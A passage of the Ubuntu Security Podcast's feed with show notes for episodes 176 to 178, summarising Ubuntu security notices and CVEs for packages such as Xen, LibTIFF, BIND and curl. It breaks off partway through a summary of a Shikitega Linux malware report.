<h3 id="usn-5617-1-xen-vulnerabilities-07-45">[<a href="https://ubuntu.com/security/notices/USN-5617-1">USN-5617-1</a>] Xen vulnerabilities [07:45]</h3>
<ul>
<li>20 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-25604">CVE-2020-25604</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25603">CVE-2020-25603</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25602">CVE-2020-25602</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25601">CVE-2020-25601</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25600">CVE-2020-25600</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25599">CVE-2020-25599</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25597">CVE-2020-25597</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25596">CVE-2020-25596</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25595">CVE-2020-25595</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15567">CVE-2020-15567</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15566">CVE-2020-15566</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15565">CVE-2020-15565</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15564">CVE-2020-15564</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15563">CVE-2020-15563</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11743">CVE-2020-11743</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11742">CVE-2020-11742</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11741">CVE-2020-11741</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11740">CVE-2020-11740</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11739">CVE-2020-11739</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-0543">CVE-2020-0543</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Community contributed update for xen - almost wins the award for the most CVEs
patched in a single update for this week</li>
<li>Most issues allow a malicious guest to attack the host -&gt; DoS, privesc,
code-exec etc</li>
</ul>
<h3 id="usn-5619-1-libtiff-vulnerabilities-08-17">[<a href="https://ubuntu.com/security/notices/USN-5619-1">USN-5619-1</a>] LibTIFF vulnerabilities [08:17]</h3>
<ul>
<li>7 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-2058">CVE-2022-2058</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2057">CVE-2022-2057</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2056">CVE-2022-2056</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1355">CVE-2022-1355</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1354">CVE-2022-1354</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-19144">CVE-2020-19144</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-19131">CVE-2020-19131</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Another package vying for most security updates recently</li>
<li>Usual memory corruption issues when handling crafted files - stack / heap
buffer overflows etc</li>
</ul>
<h3 id="usn-5618-1-ghostscript-vulnerability-08-49">[<a href="https://ubuntu.com/security/notices/USN-5618-1">USN-5618-1</a>] Ghostscript vulnerability [08:49]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-27792">CVE-2020-27792</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Heap buffer overflow when parsing a crafted PDF</li>
</ul>
<h3 id="usn-5626-1-bind-vulnerabilities-08-58">[<a href="https://ubuntu.com/security/notices/USN-5626-1">USN-5626-1</a>] Bind vulnerabilities [08:58]</h3>
<ul>
<li>6 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-38178">CVE-2022-38178</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-38177">CVE-2022-38177</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3080">CVE-2022-3080</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2906">CVE-2022-2906</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2881">CVE-2022-2881</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2795">CVE-2022-2795</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Memory leaks when handling certain crypto algorithms with DNSSEC,
resource-based DoS, buffer over-read -&gt; info leak / crash, assertion-based
crash via crafted query</li>
</ul>
<h3 id="usn-5625-1-mako-vulnerability-09-22">[<a href="https://ubuntu.com/security/notices/USN-5625-1">USN-5625-1</a>] Mako vulnerability [09:22]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-40023">CVE-2022-40023</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>ReDoS via crafted content</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="preparing-for-the-release-of-ubuntu-pro-09-44">Preparing for the release of Ubuntu Pro [09:44]</h3>
<ul>
<li>Team has worked on this for the last few years - finally will see the light of
day in the coming week or two - more details to come</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E178.mp3" length="11247928" type="audio/mpeg" /><itunes:duration>655</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 177
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-177/</link>
          <pubDate>Fri, 16 Sep 2022 16:18:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>95f122fada84fa4c0f9d2b0878278d04745a62e38260dabf210a9daa35041fc3e8152b85ff224f7421c649458e4498cf1c231ad99c89cb296298a12fda6e0aea</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 177</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          Alex talks with special guests Nishit Majithia and Matthew Ruffell about a
  recent systemd regression on Ubuntu 18.04 LTS plus we cover security updates for
  Dnsmasq, the Linux kernel, poppler, .NET 6, rust-regex and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  Alex talks with special guests Nishit Majithia and Matthew Ruffell about a
  recent systemd regression on Ubuntu 18.04 LTS plus we cover security updates for
  Dnsmasq, the Linux kernel, poppler, .NET 6, rust-regex and more.
  </itunes:summary>
        <description>  Alex talks with special guests Nishit Majithia and Matthew Ruffell about a
  recent systemd regression on Ubuntu 18.04 LTS plus we cover security updates for
  Dnsmasq, the Linux kernel, poppler, .NET 6, rust-regex and more.
  </description>
        <googleplay:description>  Alex talks with special guests Nishit Majithia and Matthew Ruffell about a
  recent systemd regression on Ubuntu 18.04 LTS plus we cover security updates for
  Dnsmasq, the Linux kernel, poppler, .NET 6, rust-regex and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>Alex talks with special guests Nishit Majithia and Matthew Ruffell about a
recent systemd regression on Ubuntu 18.04 LTS plus we cover security updates for
Dnsmasq, the Linux kernel, poppler, .NET 6, rust-regex and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>28 unique CVEs addressed</p>
<h3 id="usn-4976-2-dnsmasq-vulnerability-00-55">[<a href="https://ubuntu.com/security/notices/USN-4976-2">USN-4976-2</a>] Dnsmasq vulnerability [00:55]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3448">CVE-2021-3448</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-118/#usn-4976-1-dnsmasq-vulnerability-08-56">[USN-4976-1] Dnsmasq vulnerability for Episode 118</a></li>
<li>Failed to properly randomise source port (ie used a fixed port) when
forwarding queries when configured to use a specific server for a given
network interface - could then allow a remote attacker to more easily
perform cache poisoning attacks (ie just need to guess the transmission
ID once know the source port to get a forged reply accepted)
<ul>
<li>As I said back in Episode 118, this is very similar to the issues that were
discovered back in 2008 by Dan Kaminsky - the whole reason source port
randomisation was introduced as part of the DNS protocol</li>
</ul>
</li>
</ul>
<h3 id="usn-5602-1-linux-kernel--raspberry-pi--vulnerabilities-02-11">[<a href="https://ubuntu.com/security/notices/USN-5602-1">USN-5602-1</a>] Linux kernel (Raspberry Pi) vulnerabilities [02:11]</h3>
<ul>
<li>9 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-2959">CVE-2022-2959</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2873">CVE-2022-2873</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2503">CVE-2022-2503</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1973">CVE-2022-1973</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1943">CVE-2022-1943</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1852">CVE-2022-1852</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1729">CVE-2022-1729</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1012">CVE-2022-1012</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33061">CVE-2021-33061</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-176/#usn-5594-1-usn-5599-1-linux-kernel--plus-oracle--vulnerabilities-01-28">See [USN-5594-1, USN-5599-1] Linux kernel (+ Oracle) vulnerabilities from last week</a></li>
</ul>
<h3 id="usn-5603-1-linux-kernel--raspberry-pi--vulnerabilities-02-29">[<a href="https://ubuntu.com/security/notices/USN-5603-1">USN-5603-1</a>] Linux kernel (Raspberry Pi) vulnerabilities [02:29]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-33656">CVE-2021-33656</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33061">CVE-2021-33061</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-176/#usn-5592-1-usn-5595-1-usn-5596-1-usn-5600-1-linux-kernel--plus-oem-hwe--vulnerabilities-01-04">See [USN-5592-1, USN-5595-1, USN-5596-1, USN-5600-1] Linux kernel (+ OEM, HWE) vulnerabilities from last week</a></li>
</ul>
<h3 id="usn-5605-1-linux-kernel--azure-cvm--vulnerabilities-02-38">[<a href="https://ubuntu.com/security/notices/USN-5605-1">USN-5605-1</a>] Linux kernel (Azure CVM) vulnerabilities [02:38]</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-33656">CVE-2021-33656</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33061">CVE-2021-33061</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-176/#usn-5592-1-usn-5595-1-usn-5596-1-usn-5600-1-linux-kernel--plus-oem-hwe--vulnerabilities-01-04">See [USN-5592-1, USN-5595-1, USN-5596-1, USN-5600-1] Linux kernel (+ OEM, HWE) vulnerabilities from last week</a></li>
</ul>
<h3 id="usn-5523-2-libtiff-vulnerabilities-02-45">[<a href="https://ubuntu.com/security/notices/USN-5523-2">USN-5523-2</a>] LibTIFF vulnerabilities [02:45]</h3>
<ul>
<li>7 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-19144">CVE-2020-19144</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-19131">CVE-2020-19131</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22844">CVE-2022-22844</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0924">CVE-2022-0924</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0909">CVE-2022-0909</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0908">CVE-2022-0908</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0907">CVE-2022-0907</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-169/#usn-5523-1-libtiff-vulnerabilities-08-02">[USN-5523-1] LibTIFF vulnerabilities from Episode 169</a></li>
</ul>
<h3 id="usn-5604-1-libtiff-vulnerabilities-03-13">[<a href="https://ubuntu.com/security/notices/USN-5604-1">USN-5604-1</a>] LibTIFF vulnerabilities [03:13]</h3>
<ul>
<li>3 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-2868">CVE-2022-2868</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2869">CVE-2022-2869</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2867">CVE-2022-2867</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5606-1-poppler-vulnerability-03-23">[<a href="https://ubuntu.com/security/notices/USN-5606-1">USN-5606-1</a>] poppler vulnerability [03:23]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-38784">CVE-2022-38784</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Integer overflow in JBIG2 decoder -&gt; heap buffer overflow via crafted PDF /
JBIG2 image - very similar to <a href="https://ubuntu.com/security/CVE-2022-38171">CVE-2022-38171</a> in xpdf
<ul>
<li>poppler started life as a fork of code from xpdf-3.0 but now has diverged so
much that in general a vuln in one cannot be assumed to exist in the other,
hence the separate CVE IDs for these two vulns</li>
</ul>
</li>
</ul>
<h3 id="usn-5607-1-gdk-pixbuf-vulnerability-04-11">[<a href="https://ubuntu.com/security/notices/USN-5607-1">USN-5607-1</a>] GDK-PixBuf vulnerability [04:11]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-44648">CVE-2021-44648</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Heap buffer overflow when decoding lzw compressed stream from GIF files</li>
</ul>
<h3 id="usn-5608-1-dpdk-vulnerability-04-26">[<a href="https://ubuntu.com/security/notices/USN-5608-1">USN-5608-1</a>] DPDK vulnerability [04:26]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-2132">CVE-2022-2132</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Crafted Vhost header could cause a DoS</li>
</ul>
<h3 id="usn-5609-1-dot-net-6-vulnerability-04-39">[<a href="https://ubuntu.com/security/notices/USN-5609-1">USN-5609-1</a>] .NET 6 vulnerability [04:39]</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-38013">CVE-2022-38013</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>DoS in .NET Core - &ldquo;a malicious client could cause a stack overflow which may
result in a denial of service attack when an attacker sends a customized
payload that is parsed during model binding&rdquo;</li>
<li><a href="https://devblogs.microsoft.com/dotnet/september-2022-updates/">https://devblogs.microsoft.com/dotnet/september-2022-updates/</a></li>
<li>Updates to latest upstream release 6.0.109</li>
</ul>
<h3 id="usn-5583-2-systemd-regression-05-16">[<a href="https://ubuntu.com/security/notices/USN-5583-2">USN-5583-2</a>] systemd regression [05:16]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-2526">CVE-2022-2526</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Mentioned in passing in both the last 2 weeks episodes</li>
</ul>
<h3 id="usn-5610-1-rust-regex-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5610-1">USN-5610-1</a>] rust-regex vulnerability</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-24713">CVE-2022-24713</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>ReDoS in regex crate - already includes various mitigations against DoS via
untrusted regexes (and these can be tuned by users of the crate) - however was
able to be bypassed by a regex that specified an empty subexpression that
should be matched up to say 294 million times - this then gets compiled but is
able to evade the existing mitigations since doesn&rsquo;t take any memory - but it
does take a lot of CPU time</li>
<li>Fixed by changing code such that it will take a fake amount of memory for each
empty subexpression and therefore will trip the existing detection logic in a
reasonable amount of time</li>
</ul>
<h3 id="usn-5611-1-webkitgtk-vulnerability-06-53">[<a href="https://ubuntu.com/security/notices/USN-5611-1">USN-5611-1</a>] WebKitGTK vulnerability [06:53]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-32893">CVE-2022-32893</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>OOB write via malicious web content - Apple reported that this was being
actively exploited for iOS users (Safari uses Webkit)</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="discussion-of-the-recent-systemd-regression-in-ubuntu-18-dot-04-lts-with-nishit-majithia-and-matthew-ruffell-07-49">Discussion of the recent systemd regression in Ubuntu 18.04 LTS with Nishit Majithia and Matthew Ruffell [07:49]</h3>
<ul>
<li>Gathered media attention</li>
<li><a href="https://thenewstack.io/ubuntu-linux-and-azure-dns-problem-gives-azure-fits/">https://thenewstack.io/ubuntu-linux-and-azure-dns-problem-gives-azure-fits/</a></li>
<li>Matthew is from the Sustaining Engineering Team at Canonical - I talked about
his blog in <a href="/episode-97/#analysis-of-the-dovecat-and-hy4-linux-malware-12-36">Analysis of the dovecat and hy4 Linux Malware - from Episode 97</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E177.mp3" length="31562912" type="audio/mpeg" /><itunes:duration>1868</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 176
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-176/</link>
          <pubDate>Fri, 09 Sep 2022 14:20:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>0911577d54ba0fb45c577e01f98db9b4d2ad924219830d9166749894b47fab9d1c47be6bf70a24e28a0171cb22c8217d0953e79c8b1f10ce7cc44acbc78bff5b</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 176</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          On this week's episode we dive into the Shikitega Linux malware report from AT&amp;T
  Alien Labs, plus we cover security updates for the Linux kernel, curl and
  Zstandard as well as some open positions on the team. Join us!
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  On this week's episode we dive into the Shikitega Linux malware report from AT&amp;T
  Alien Labs, plus we cover security updates for the Linux kernel, curl and
  Zstandard as well as some open positions on the team. Join us!
  </itunes:summary>
        <description>  On this week's episode we dive into the Shikitega Linux malware report from AT&amp;T
  Alien Labs, plus we cover security updates for the Linux kernel, curl and
  Zstandard as well as some open positions on the team. Join us!
  </description>
        <googleplay:description>  On this week's episode we dive into the Shikitega Linux malware report from AT&amp;T
  Alien Labs, plus we cover security updates for the Linux kernel, curl and
  Zstandard as well as some open positions on the team. Join us!
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>On this week&rsquo;s episode we dive into the Shikitega Linux malware report from AT&amp;T
Alien Labs, plus we cover security updates for the Linux kernel, curl and
Zstandard as well as some open positions on the team. Join us!</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>13 unique CVEs addressed</p>
<h3 id="usn-5591-1-usn-5591-2-usn-5591-3-usn-5591-4-usn-5597-1-usn-5598-1-linux-kernel--plus-hwe-aws-oracle--vulnerability-00-47">[<a href="https://ubuntu.com/security/notices/USN-5591-1">USN-5591-1</a>, <a href="https://ubuntu.com/security/notices/USN-5591-2">USN-5591-2</a>, <a href="https://ubuntu.com/security/notices/USN-5591-3">USN-5591-3</a>, <a href="https://ubuntu.com/security/notices/USN-5591-4">USN-5591-4</a>, <a href="https://ubuntu.com/security/notices/USN-5597-1">USN-5597-1</a>, <a href="https://ubuntu.com/security/notices/USN-5598-1">USN-5598-1</a>] Linux kernel (+ HWE, AWS, Oracle) vulnerability [00:47]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-33656">CVE-2021-33656</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>OOB write in virtual terminal driver when changing VGA console fonts - covered
back in <a href="/episode-175/#usn-5580-1-linux-kernel--aws--vulnerabilities-01-54">USN-5580-1 - Linux kernel (AWS) vulnerabilities - in Episode 175</a></li>
</ul>
<h3 id="usn-5592-1-usn-5595-1-usn-5596-1-usn-5600-1-linux-kernel--plus-oem-hwe--vulnerabilities-01-04">[<a href="https://ubuntu.com/security/notices/USN-5592-1">USN-5592-1</a>, <a href="https://ubuntu.com/security/notices/USN-5595-1">USN-5595-1</a>, <a href="https://ubuntu.com/security/notices/USN-5596-1">USN-5596-1</a>, <a href="https://ubuntu.com/security/notices/USN-5600-1">USN-5600-1</a>] Linux kernel (+ OEM, HWE) vulnerabilities [01:04]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-33656">CVE-2021-33656</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33061">CVE-2021-33061</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>OOB write in virtual terminal driver when changing VGA console fonts</li>
<li>Improper control flow mgmt in Intel 10GbE PCIe driver - local DoS</li>
</ul>
<h3 id="usn-5594-1-usn-5599-1-linux-kernel--plus-oracle--vulnerabilities-01-28">[<a href="https://ubuntu.com/security/notices/USN-5594-1">USN-5594-1</a>, <a href="https://ubuntu.com/security/notices/USN-5599-1">USN-5599-1</a>] Linux kernel (+ Oracle) vulnerabilities [01:28]</h3>
<ul>
<li>9 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-2959">CVE-2022-2959</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2873">CVE-2022-2873</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2503">CVE-2022-2503</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1973">CVE-2022-1973</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1943">CVE-2022-1943</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1852">CVE-2022-1852</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1729">CVE-2022-1729</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1012">CVE-2022-1012</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33061">CVE-2021-33061</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Above issues plus:
<ul>
<li>NULL pointer deref in KVM on host if a VM tried to execute an illegal instruction</li>
<li>OOB write in UDF file-system driver</li>
<li>UAF in NFTS under certain error conditions</li>
<li>OOB write in Intel SMBus host controller driver</li>
<li>Race condition in handling of pipe buffers -&gt; OOB</li>
</ul>
</li>
</ul>
<h3 id="usn-5587-1-curl-vulnerability-02-12">[<a href="https://ubuntu.com/security/notices/USN-5587-1">USN-5587-1</a>] curl vulnerability [02:12]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-35252">CVE-2022-35252</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Cookies generally contain <code>NAME=VALUE</code> pairs using ASCII chars for both</li>
<li><a href="http://man.he.net/?topic=ascii&amp;section=all">ASCII character set</a> contains usual A-Za-z0-9 and punctuation (space, &ldquo;!#&amp;)
plus a bunch of control codes - NUL, BEL, LF, CR, HT (\t) and more</li>
<li>These have a byte value below 32</li>
<li>curl since 4.9 would accept cookies with control codes</li>
<li>As with cookies, these get sent back to the server on subsequent requests</li>
<li>Over time web servers have started rejecting cookies with control codes and
returning a HTTP 400 response code (Bad Request)</li>
<li>As such, a malicious &ldquo;sister site&rdquo; could return a cookie with control codes
inside it, this then would get sent by curl to other sites in the same domain,
which would then reject the request and effectively DoS the user</li>
<li>Fixed to have curl validate and then reject such cookies in the first place</li>
</ul>
<h3 id="usn-5593-1-zstandard-vulnerability-04-34">[<a href="https://ubuntu.com/security/notices/USN-5593-1">USN-5593-1</a>] Zstandard vulnerability [04:34]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11922">CVE-2019-11922</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-44/#usn-4108-1-zstandard-vulnerability-09-20">Originally discussed all the way back in Episode 44 - [USN-4108-1] Zstandard
vulnerability</a></li>
<li>Race condition when using single-pass compression, might allow attacker
to get OOB write IF the caller had provided a smaller output buffer than
the recommended size</li>
<li>So likely won&rsquo;t affect all packages which use zstd (there are many) -
should always follow best practice</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="at-and-t-alien-labs-teardown-of-shikitega-linux-malware-05-40">AT&amp;T Alien Labs teardown of Shikitega Linux malware [05:40]</h3>
<ul>
<li><a href="https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux">https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux</a></li>
<li>Targets endpoints and IoT devices running Linux</li>
<li>Uses multiple different binaries to achieve its purpose - each does one task
of the process</li>
<li>Uses various components of <a href="https://github.com/rapid7/metasploit-framework">Metasploit</a> along the way
<ul>
<li>Framework containing various exploits plus different tools to help develop
exploits as well as scan environments etc</li>
</ul>
</li>
<li>Initial dropper is a very small binary that is encoded using one of the
standard Metasploit encoders to help it evade detection from AV scanners etc</li>
